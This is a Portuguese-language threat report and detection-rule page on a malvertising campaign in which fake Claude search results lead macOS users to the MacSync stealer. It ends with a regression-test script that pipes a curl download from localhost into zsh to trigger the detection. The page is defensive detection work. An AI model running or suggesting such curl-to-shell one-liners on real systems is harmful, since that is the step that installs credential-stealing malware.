Resultados falsos de busca por Claude levam usuários de macOS ao MacSync Stealer
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os atores de ameaça estão abusando de malvertising nos resultados de busca do Google para redirecionar usuários a conversas compartilhadas legítimas no Claude.ai contendo instruções para executar maliciosos curl comandos. A cadeia de ataque entrega o MacSync, um avançado ladrão de macOS e RAT projetado para exfiltrar credenciais, segredos do Keychain e dados de carteiras de criptomoedas. O malware segue uma cadeia de ataque complexa de seis estágios envolvendo execução na memória e abuso de permissões TCC.
Investigação
Analistas da Huntress investigaram a campanha de malvertising após um cliente ter sido comprometido por meio de um guia de instalação fraudulento do Claude. Os pesquisadores contornaram as proteções dos atacantes e recuperaram uma amostra de malware diretamente da infraestrutura do adversário. A investigação descobriu uma cadeia de execução em múltiplos estágios envolvendo um zsh carregador, roubo de dados baseado em AppleScript e um RAT Mach-O usado para estabelecer persistência.
Mitigação
Os usuários devem evitar copiar e executar comandos não verificados no Terminal, mesmo quando as instruções aparecem em domínios legítimos ou confiáveis. As equipes de segurança devem monitorar atividades suspeitas curl e conteúdo codificado em Base64 dentro de processos de shell. Ferramentas como BlockBlock e LuLu também podem ajudar a detectar mecanismos de persistência no macOS e conexões de rede não autorizadas para fora.
Resposta
Se atividade do MacSync for detectada, o dispositivo macOS afetado deve ser isolado imediatamente para interromper mais exfiltração de dados. Os investigadores devem revisar o histórico do shell e a telemetria do endpoint para execuções não autorizadas. curl or zsh Mudanças nas permissões TCC também devem ser examinadas, junto com LaunchAgents não autorizados e binários de aplicativos modificados, sobretudo aqueles associados a carteiras de criptomoedas.
Fluxo de Ataque
Detecções
Tentativa de Execução de Curl Suspeita [MacOS] (via cmdline)
Arquivo Foi Criado na Pasta Temporária do MacOS (via file_event)
IOCs (SourceIP) para detectar: Como uma Busca no Google por Claude Levou ao MacSync
IOCs (DestinationIP) para detectar: Como uma Busca no Google por Claude Levou ao MacSync
Resultado de Busca Malicioso Leva ao MacSync Infostealer [Servidor Web]
Conexão de Comando e Controle de RAT Mach-O via WebSockets [Conexão de Rede Windows]
Detecção da Campanha de Malvertising MacSync Usando Curl com Carregador Zsh [Criação de Processo Linux]
Execução de Simulação
Pré-requisito: A Verificação Pré-executória Telemetria & Baseline deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão ao mau diagnóstico.
-
Narrativa de Ataque & Comandos: O adversário mira o usuário por meio de uma atualização de software falsa (malvertising). Uma vez que o usuário executa o comando fornecido no terminal,
curlbusca um script malicioso. Este script é imediatamente canalizado emzsh. O script contém uma string específicadaemon_functionque é usada para esconder processos de fundo maliciosos. A regra de detecção está especificamente procurando a combinação decurl,zsh, e odaemon_functionstring na linha de comando para identificar esta campanha específica. -
Script de Teste de Regressão:
#!/bin/bash # Script de simulação para validação de detecção de MacSync Malvertising. # Isso simula um usuário executando um one-liner que busca e executa um script. echo "[+] Iniciando Simulação de MacSync..." # Simulamos o comando criando um script "malicioso" local # e então executando exatamente o padrão de linha de comando que a regra procura. echo "function daemon_function() { echo 'Exfiltrando dados...'; }; daemon_function" > /tmp/fake_payload.sh chmod +x /tmp/fake_payload.sh # Este é o padrão exato: curl + zsh + daemon_function # Usamos um subshell para simular o comportamento de piping echo "[+] Executando linha de comando maliciosa..." curl -s http://localhost/fake_payload.sh | zsh -s daemon_function echo "[+] Comando de simulação executado." -
Comandos de Limpeza:
# Remove o payload simulado e arquivos temporários. rm /tmp/fake_payload.sh echo "[+] Limpeza completa."